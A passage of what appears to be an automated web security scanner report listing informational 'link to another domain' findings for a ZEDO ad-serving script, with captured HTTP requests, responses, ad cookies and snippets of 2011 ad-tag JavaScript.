document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.33;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929078%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=20%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=20%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.156. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.009805771930176177 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=1:None:None:None; FFCap=1574B809,210132|0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:49 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:None:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=212
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:49 GMT
Connection: close
Content-Length: 2855

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=1%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=1%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.157. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7047339260035059 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=4:5:3:None; FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:09 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:4:3:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:09 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.158. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9142265539229021 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=34:35:34:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=35:34:35:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:49:21 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=35%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=35%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.159. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.49883930598955767 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=57:68:58:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=59:57:68:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:15 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=59%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=59%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.160. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.49928373668236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=7:7:3:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:2,1,1:1,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:36 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:7:7:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=225
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:36 GMT
Connection: close
Content-Length: 2684

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931213%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=4%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=4%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.161. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.34548330139241534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=23:25:24:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:4,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=24:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=100
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:41 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=24%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=24%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.162. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8744609614302878 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=41:39:37:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=38:41:39:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:40 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=38%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=38%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.163. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.21106055033186471 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=30:30:28:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=29:30:30:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:57 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=29%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=29%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.164. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.37780483623600613 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFad=6:3:6:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|2,1,1:2,1,1:1,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:35 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:3:6:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=226
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:35 GMT
Connection: close
Content-Length: 2672

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=7%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=7%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.165. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.6196228306066651 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=12:12:13:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:12:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=142
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:59 GMT
Connection: close
Content-Length: 2109

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
